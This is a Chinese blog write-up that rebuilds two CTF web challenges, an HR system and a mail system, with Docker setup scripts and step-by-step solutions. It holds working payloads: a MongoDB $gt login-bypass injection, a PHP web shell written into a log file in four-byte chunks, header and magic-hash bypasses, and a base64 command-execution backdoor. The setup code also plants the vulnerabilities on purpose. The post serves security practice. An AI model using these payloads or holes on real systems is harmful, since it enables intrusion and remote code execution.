docker push推送自己搭建的镜像

简介: 本文详细介绍了如何搭建和复盘两个Web安全挑战环境:人力资源管理系统和邮件管理系统。首先,通过Docker搭建MongoDB和PHP环境,模拟人力资源管理系统的漏洞,包括nosql注入和文件写入等。接着,复盘了如何利用这些漏洞获取flag。邮件管理系统部分,通过目录遍历、文件恢复和字符串比较等技术,逐步绕过验证并最终获取flag。文章提供了详细的步骤和代码示例,适合安全研究人员学习和实践。

e51cca0dd9b33c89afecb2298aca25ba.png

Docker push命令使用 Docker镜像推送到远程仓库 Docker镜像推送Dockerhub_HaHa_Sir的博客-CSDN博客

Docker 镜像 重命名_docker镜像改名_微风--轻许--的博客-CSDN博客

Docker镜像推送(push)到Docker Hub_docker push_强大的石头的博客-CSDN博客

首先要将运行中的容器保存为镜像

image.png

我顺表还save打包了一个.tar文件,方便可以load载入。

但是第一次保存的命名格式不符合推送规范,所以决定tag一下:

image.png

然后即可推送了:

image.png

一个国赛环境的搭建转载自

https://mp.weixin.qq.com/s/nE3lPXWR0I3HfrFz-OnOHA

如有侵权联系删除

0x02 人力资源管理系统

2.1 复盘解析

首先访问首页就是一个展示

image.png

然后在robots.txt里面能看到一个nosql.php,然后这里就会给出第一个flag,因为是自己模拟就不写flag了

image.png

来到nosql.php之后会发现是一个登入页面

随便输一个账号密码登入失败

MongoDB 与 RDBMS Where 语句的比较

操作 格式 范例 RDBMS 中的类似语句
等于 { :} db.love.find({"name":"whoami"}).pretty() where name = 'whoami'
小于 { :{\$lt:}} db.love.find({"age":{\$lt:19}}).pretty() where age < 19
小于或等于 { :{\$lte:}} db.love.find({"age":{\$lte:19}}).pretty() where likes <= 19
大于 { :{\$gt:}} db.love.find({"age":{\$gt:19}}).pretty() where likes > 19
大于或等于 { :{\$gte:}} db.love.find({"age":{\$gte:19}}).pretty() where likes >= 19
不等于 { :{\$ne:}} db.love.find({"age":{\$ne:19}}).pretty() where likes != 19

这里随便选一个我这里就选\$gt也就是大于,大于某个数的值会被列出

nosql.php?username[$gt]=&password[$gt]=

可以看到这里列出了所有的用户名密码,然后在这里就会得到此题的第二个flag

image.png

查看源代码可以发现页面给了两个参数提示一个o一个hint

<?php $o = intval($_GET['o']);   $hint = $_POST['hint']; ?>

image.png

尝试传入o跟hint,可以发现我们传入的被写入跟执行了

image.png

o是要写入的位置,然后hint是写入的内容最多4个字符

image.png

那么这里写个shell进去,每写4个字符o都+4

o=1
hint=<?= 

o=5
hint=syst

o=9
hint=em($

o=13
hint=_GET

o=17
hint=[1])

o=21
hint=;//

到此就写入了一个shell

image.png

执行一下ls,然后cat 一下/flag即可得到第三个flag

image.png

nosql注入可以参考 https://xz.aliyun.com/t/9908

2.2 环境搭建过程

2.2.1 mongodb

首先pull mongodb 镜像

docker pull mongo:latest

然后启动mongodb ,注意这里启动的是无需认证的

docker run --name mongodb -d -p 27017:27017 mongo

image.png

然后进入容器

docker exec -it mongodb /bin/mongosh
这里我用的是: docker exec -it mongodb mongo

MongoDB 中选中 test 数据库,创建一个 users 集合并插入文档数据

use test
db.createCollection('users')
db.users.insert({username: 'mo60', password: '123456'})
db.users.insert({username: 'Juneha', password: '624522'})
db.users.insert({username: 'Jack', password: '468052'})
db.users.insert({username: '06om', password: '965379'})

2.2.2 php

这里pull一下php的镜像

docker pull bigtruedata/php-mongodb

然后启动容器

docker run -itd --name php-mongodb -v  ./php-www:/var/www/html -p 80:80  bigtruedata/php-mongodb

然后进入当前目录下的php-www目录,创建.sh文件内容如下运行即可生成所需文件,到此环境搭建过程结束

image.png

#!/bin/bash

read -p "请输入 MongoDB IP 地址: " mongodb_ip
if [[ ! $mongodb_ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
    echo "无效的 IP 地址!请重新运行脚本,并输入有效的 IP 地址。"
    exit 1
fi
robots_content="User-agent: *\nDisallow: /nosql.php"
log_content="<?php \$o = intval(\$_GET['o']);   \$hint = \$_POST['hint']; ?>"
php_content="<!DOCTYPE html>
<html>
<head>
  <title>登录</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f2f2f2;
      margin: 0;
      padding: 0;
    }
    .container {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }
    .card {
      width: 450px;
      padding: 20px;
      border-radius: 5px;
      box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
      background-color: #fff;
    }
    .card h2 {
      text-align: center;
      color: #333;
      margin-bottom: 20px;
    }
    .card table {
      width: 100%;
      border-collapse: collapse;
      margin-bottom: 20px;
    }
    .card table td {
      padding: 10px;
      border: 1px solid #ccc;
      font-size: 14px;
    }
    .card form input[type=\"text\"],
    .card form input[type=\"password\"] {
      width: 97%;
      padding: 10px;
      margin-bottom: 10px;
      border: 1px solid #ccc;
      border-radius: 3px;
      font-size: 14px;
    }
    .card form button {
      width: 100%;
      padding: 10px;
      border: none;
      background-color: #4CAF50;
      color: #fff;
      font-size: 14px;
      cursor: pointer;
    }
    .card form button:hover {
      background-color: #45a049;
    }
  </style>
    <!-- https://blog.mo60.cn/index.php/archives/2023-China-Skills-Security-web1.html -->
</head>
<body>
  <div class=\"container\">
    <div class=\"card\">
<?php 
if (isset(\$_REQUEST['username']) && isset(\$_REQUEST['password'])) {
    \$manager = new MongoDB\Driver\Manager(\"mongodb://$mongodb_ip:27017\");
    \$username = \$_REQUEST['username'];
    \$password = \$_REQUEST['password'];

    \$query = new MongoDB\Driver\Query(array(
        'username' => \$username,
        'password' => \$password
    ));

    \$result = \$manager->executeQuery('test.users', \$query)->toArray();
    \$count = count(\$result);

    if (\$count > 0) {
        echo '<h2>用户信息</h2>';
        echo '<table>';

        foreach (\$result as \$user) {
            \$user = ((array)\$user);
            echo '<tr><td>用户名:</td><td>' . \$user['username'] . '</td></tr>';
            echo '<tr><td>密码:</td><td>' . \$user['password'] . '</td></tr>';
        }

        echo '</table>';
        \$o = intval(\$_GET['o']);
        \$hint = substr(\$_POST['hint'], 0, 4);
        \$file = 'nosql.log';

        if (!empty(\$o) && !empty(\$hint)) {
            \$contents = file_get_contents(\$file);
            \$part1 = substr(\$contents, 0, \$o);
            \$part2 = substr(\$contents, \$o + strlen(\$hint)); 
            \$newContents = \$part1 . \$hint . \$part2;
            file_put_contents(\$file, \$newContents);
        }

        if (file_exists(\$file)) {
            echo file_get_contents(\$file);
            include \$file;
        }
    } else {
        echo 'Login Failed';
    }
} else {
    echo '<h2>登录</h2>';
    echo '<form action=\"\" method=\"get\">';
    echo '<input type=\"text\" name=\"username\" placeholder=\"用户名\" required><br>';
    echo '<input type=\"password\" name=\"password\" placeholder=\"密码\" required><br>';
    echo '<button type=\"submit\">登录</button>';
    echo '</form>';
}
?>

    </div>
  </div>
</body>
</html>"
html_content="<!DOCTYPE html>
<html>
<head>
  <meta charset=\"UTF-8\">
  <title>人力资源管理系统</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 20px;
      background-color: #f2f2f2;
    }

    h1 {
      text-align: center;
    }

    .container {
      max-width: 600px;
      margin: 0 auto;
      background-color: #fff;
      padding: 20px;
      border-radius: 5px;
      box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
    }

    p {
      line-height: 1.5;
    }
  </style>
</head>
<body>
  <div class=\"container\">
    <h1>欢迎来到人力资源管理系统!</h1>
  </div>
</body>
</html>"
echo "https://blog.mo60.cn/index.php/archives/2023-China-Skills-Security-web1.html"
echo -e "$robots_content" > robots.txt

if [ -e robots.txt ]; then
    echo "robots.txt 写入成功!"
else
    echo "robots.txt 写入失败!"
fi

echo "$log_content" > nosql.log

if [ -e nosql.log ]; then
    echo "nosql.log 写入成功!"
    chmod 777 nosql.log
else
    echo "nosql.log 写入失败!"
fi

echo -e "$html_content" > index.html

if [ -e index.html ]; then
    echo "index.html 写入成功!"
else
    echo "index.html 写入失败!"
fi

echo "$php_content" > nosql.php

if [ -e nosql.php ]; then
    echo "nosql.php 写入成功!"
else
    echo "nosql.php 写入失败!"
fi

0x03 邮件管理系统

3.1 复盘解析

直接访问页面会跳401未授权,这里我试了XFF头啥的绕过无果

image.png

然后查看一下robots.txt发现提示了 weblogs_manage.php

image.png

访问了一样跳401未授权,这里我就用了dirbuster的大目录字典扫出来一个emails

image.png

访问发现可以目录遍历

image.png

查看f1发现说因为编辑器备份文件泄露导致了安全漏洞

这里就想到了vim编辑器那个,这里下载 .weblogs_manage.php.swp文件(其实一开始尝试下载这个就行但是我一开始没想到这里提示了我才想起来)

wget 192.168.31.148/.weblogs_manage.php.swp

然后新建一个weblogs_manage.php在vim编辑按R恢复

touch weblogs_manage.php
vim weblogs_manage.php
R

即可成功恢复源码

这里主要代码是

<?php
error_reporting(0);
if(@$_SERVER['HTTP_INTERNAL_AUTH']!=="10.10.10.1"){
    header("Location: template/401.html");
    exit();
}
$key1=$_REQUEST['key1'];
if(!empty($key1)){
    require_once 'next.php';
    if(md5($key1)=="0e230420452993424058024229903331"){
        $key2=$_REQUEST['key2'];
        if(!empty($key2)){
            for($i=0;$i<strlen($key2);$i++){

                $o=ord($key2[$i])^ord('o');

                if($o=="95" || $o=="32"){
                    if(md5($key2)=="5bacf485801484d2ea1d0237782e6629"){
                        $key3=$_REQUEST['key3'];
                        if(!empty($key3)){
                            if($key3>$SECRET || strlen($key3)>=strlen($SECRET)){
                                if($key3==$SECRET){
                                    die($next); // log
                                }
                            }else{
                                die("CODE: 3 Error!");
                            }
                        }
                    }
                }else{
                    die("CODE: 2 Error!");
                }
            }
        }
    }else{
        die("CODE: 1 Error!");
    }
}
?>

首先需要绕过这个401

if(@$_SERVER['HTTP_INTERNAL_AUTH']!=="10.10.10.1"){
    header("Location: template/401.html");
    exit();
}

只需要在请求的时候带上,这个一开始是看其他请求头的格式首字母大写然后_改-尝试出来的,这样即可绕过401

Internal-Auth: 10.10.10.1

image.png

接下来需要传入\$key1-3来绕过限制,这里来到第一个\$key的限制,很明显是要一个md5加密后为0e的数字才能绕过

if(md5($key1)=="0e230420452993424058024229903331"

在比赛过程中没有网我也没有记这种特定的字符我就想到了拿php去跑一下试试看,还真的让我跑出来一个0e215962017

<?php
for($i=0;$i<9999999999999;$i++){
    $r="0e".$i;
    if(md5($r)=="0e230420452993424058024229903331"){
        die($r);
    }
}

image.png

这里就成功过了第一个\$key的限制

image.png

第二个\$key的限制比较麻烦,需要每一位^ord('o')后等于95或者32

for($i=0;$i<strlen($key2);$i++){
    $o=ord($key2[$i])^ord('o');
    if($o=="95" || $o=="32"){
    if(md5($key2)=="5bacf485801484d2ea1d0237782e6629"){xxxxx}
    }

这里我先遍历了所有字符看什么字符^后等于95 32 得到0O

<?php
for($i=32;$i<133;$i++){
    $o=$i^ord('o');
    if($o=="95" || $o=="32"){
        echo chr($i);
    }
}

那么就是由0O组成的字符串md5加密后要等于5bacf485801484d2ea1d0237782e6629

image.png

这里我的思路就是去生成字典,然后我就去翻kali的字典生成工具,因为以前用过然后就找到了crunch

image.png

直接生成1-16位 0O组成的字典

crunch 1 16 0O  > dict

image.png

这里用php去遍历每一个值然后判断,这里要加trim不然结尾有空格会一直对不上,我在这里卡了1个多小时最后才发现是这个问题,运行后得到0O0OO0O0O0O0OOO0到这里第二个\$key也过了

image.png

<?php

$data=file('dict');

foreach($data as $k=>$v){
    if(md5(trim($v))=="5bacf485801484d2ea1d0237782e6629"){
        echo $v;
        break;              
    }
}

?>

接下来就是有点难度的\$key3,他这里的条件是需要我们传入的\$key3等于他的\$SECRET这里的\$SECRET来自于上面的require_once 'next.php',其实原题不止这个条件有给出根据一个算法加密后的\$SECRET我不记得那个算法了,我们当时也不是解出算法的方式获取\$SECRET的这里就不在概述

if($key3>$SECRET || strlen($key3)>=strlen($SECRET)){
if($key3==$SECRET){
    die($next); // log
}

这里其实可以忽略第二个条件也就是strlen的长度比较只需要看\$key3>\$SECRET这个条件,因为php里面两个字符串比较是一位一位比较的具体解释我这里用chatgpt的回答

当比较php中两个字符串变量key3和key3和SECRET的大小时,可以使用大于号(>)进行比较操作。具体流程如下:

1.获取变量key3和key3和SECRET的字符串值。
2.将这两个字符串按字典顺序逐个字符进行比较,直到找到第一个不同的字符为止。
3.如果key3中的当前字符的key
ASCII码大于key3中的当前字符的ASCII码大于SECRET中对应位置上的字符的ASCII码,则key3大于key3大于SECRET。
4.如果key3中的当前字符的keyASCII码小于key3中的当前字符的ASCII码小于SECRET中对应位置上的字符的ASCII码,则key3小于key3小于SECRET。
5.如果key3和key3和SECRET中的字符完全相同,则比较下一个字符。
6.如果其中一个字符串比另一个字符串短,则较短的字符串被认为是较小的。
7.如果两个字符串完全相同,则认为它们是相等的。
8.比较过程结束后,根据比较结果返回布尔值(true或false),表示key3是否大于key3是否大于SECRET。

也就是我们可以通过一位一位的比较来获取正确的SECRET,比如这里我们输入1提示CODE3错误

image.png

输入2也错误输入3页面正常,那么得到第一位是2

image.png

接下来可以用burp的Intruder模块来一位一位爆破出来,像这里爆破第一位字母有3个字母页面都为ture返回正常这里查一下ascii可以发现x是最小的x的前一位是w那么第五位就是w

image.png

最终算出key3等于2023welc0me,传进去后得到一个txt地址/security_log_/log.txt

image.png

访问日志是一大堆乱糟糟的日志

image.png

注意!!我做到这里比赛结束了后面的内容是我自己想的,可能跟真实比赛有出入仅供参考

把日志下载到本地然后grep正则提取出访问的文件内容

grep -oP '(?<=POST|GET)\s\S+(?= HTTP)' log.txt

image.png

然后burp批量访问一下通过aEahcEeh.php?oTGGW=zsqBtOR得到了flag-1

image.png

然后paObZJkw.php?SjSMeB=wUWp发现是404但是是页面返回的是"There is nothing here."猜测是被入侵后留下的shell

image.png

这里最后通过测试发现传入base64的值即可执行代码

paObZJkw.php?SjSMeB=cGhwaW5mbygpOw==

image.png

然后cat /flag 结束

3.2 环境搭建过程

先起一个php的容器

docker run -d -p 80:80 --name emails -v $(pwd)/mail-web:/var/www/app romeoz/docker-nginx-php:5.6

然后改一下nginx的配置文件设置成目录遍历

docker exec -it emails sed -i '/root \/var\/www\/app;/a autoindex on;\nautoindex_exact_size off;\nautoindex_localtime on;' /etc/nginx/sites-enabled/app.conf

然后重新启动nginx

docker exec -it emails  nginx -s reload

image.png

相关文章
|
6天前
|
存储 运维 安全
云上金融量化策略回测方案与最佳实践
2024年11月29日,阿里云在上海举办金融量化策略回测Workshop,汇聚多位行业专家,围绕量化投资的最佳实践、数据隐私安全、量化策略回测方案等议题进行深入探讨。活动特别设计了动手实践环节,帮助参会者亲身体验阿里云产品功能,涵盖EHPC量化回测和Argo Workflows量化回测两大主题,旨在提升量化投研效率与安全性。
云上金融量化策略回测方案与最佳实践
|
8天前
|
人工智能 自然语言处理 前端开发
从0开始打造一款APP:前端+搭建本机服务,定制暖冬卫衣先到先得
通义灵码携手科技博主@玺哥超carry 打造全网第一个完整的、面向普通人的自然语言编程教程。完全使用 AI,再配合简单易懂的方法,只要你会打字,就能真正做出一个完整的应用。
8115 19
|
12天前
|
Cloud Native Apache 流计算
资料合集|Flink Forward Asia 2024 上海站
Apache Flink 年度技术盛会聚焦“回顾过去,展望未来”,涵盖流式湖仓、流批一体、Data+AI 等八大核心议题,近百家厂商参与,深入探讨前沿技术发展。小松鼠为大家整理了 FFA 2024 演讲 PPT ,可在线阅读和下载。
4387 10
资料合集|Flink Forward Asia 2024 上海站
|
20天前
|
人工智能 自动驾驶 大数据
预告 | 阿里云邀您参加2024中国生成式AI大会上海站,马上报名
大会以“智能跃进 创造无限”为主题,设置主会场峰会、分会场研讨会及展览区,聚焦大模型、AI Infra等热点议题。阿里云智算集群产品解决方案负责人丛培岩将出席并发表《高性能智算集群设计思考与实践》主题演讲。观众报名现已开放。
|
12天前
|
自然语言处理 数据可视化 API
Qwen系列模型+GraphRAG/LightRAG/Kotaemon从0开始构建中医方剂大模型知识图谱问答
本文详细记录了作者在短时间内尝试构建中医药知识图谱的过程,涵盖了GraphRAG、LightRAG和Kotaemon三种图RAG架构的对比与应用。通过实际操作,作者不仅展示了如何利用这些工具构建知识图谱,还指出了每种工具的优势和局限性。尽管初步构建的知识图谱在数据处理、实体识别和关系抽取等方面存在不足,但为后续的优化和改进提供了宝贵的经验和方向。此外,文章强调了知识图谱构建不仅仅是技术问题,还需要深入整合领域知识和满足用户需求,体现了跨学科合作的重要性。
|
8天前
|
人工智能 容器
三句话开发一个刮刮乐小游戏!暖ta一整个冬天!
本文介绍了如何利用千问开发一款情侣刮刮乐小游戏,通过三步简单指令实现从单个功能到整体框架,再到多端优化的过程,旨在为生活增添乐趣,促进情感交流。在线体验地址已提供,鼓励读者动手尝试,探索编程与AI结合的无限可能。
三句话开发一个刮刮乐小游戏!暖ta一整个冬天!
|
1月前
|
存储 人工智能 弹性计算
阿里云弹性计算_加速计算专场精华概览 | 2024云栖大会回顾
2024年9月19-21日,2024云栖大会在杭州云栖小镇举行,阿里云智能集团资深技术专家、异构计算产品技术负责人王超等多位产品、技术专家,共同带来了题为《AI Infra的前沿技术与应用实践》的专场session。本次专场重点介绍了阿里云AI Infra 产品架构与技术能力,及用户如何使用阿里云灵骏产品进行AI大模型开发、训练和应用。围绕当下大模型训练和推理的技术难点,专家们分享了如何在阿里云上实现稳定、高效、经济的大模型训练,并通过多个客户案例展示了云上大模型训练的显著优势。
104585 10
|
7天前
|
消息中间件 人工智能 运维
12月更文特别场——寻找用云高手,分享云&AI实践
我们寻找你,用云高手,欢迎分享你的真知灼见!
644 40
|
5天前
|
弹性计算 运维 监控
阿里云云服务诊断工具:合作伙伴架构师的深度洞察与优化建议
作为阿里云的合作伙伴架构师,我深入体验了其云服务诊断工具,该工具通过实时监控与历史趋势分析,自动化检查并提供详细的诊断报告,极大提升了运维效率和系统稳定性,特别在处理ECS实例资源不可用等问题时表现突出。此外,它支持预防性维护,帮助识别潜在问题,减少业务中断。尽管如此,仍建议增强诊断效能、扩大云产品覆盖范围、提供自定义诊断选项、加强教育与培训资源、集成第三方工具,以进一步提升用户体验。
631 243
|
2天前
|
弹性计算 运维 监控
云服务测评 | 基于云服务诊断全方位监管云产品
本文介绍了阿里云的云服务诊断功能,包括健康状态和诊断两大核心功能。作者通过个人账号体验了该服务,指出其在监控云资源状态和快速排查异常方面的优势,同时也提出了一些改进建议,如增加告警配置入口和扩大诊断范围等。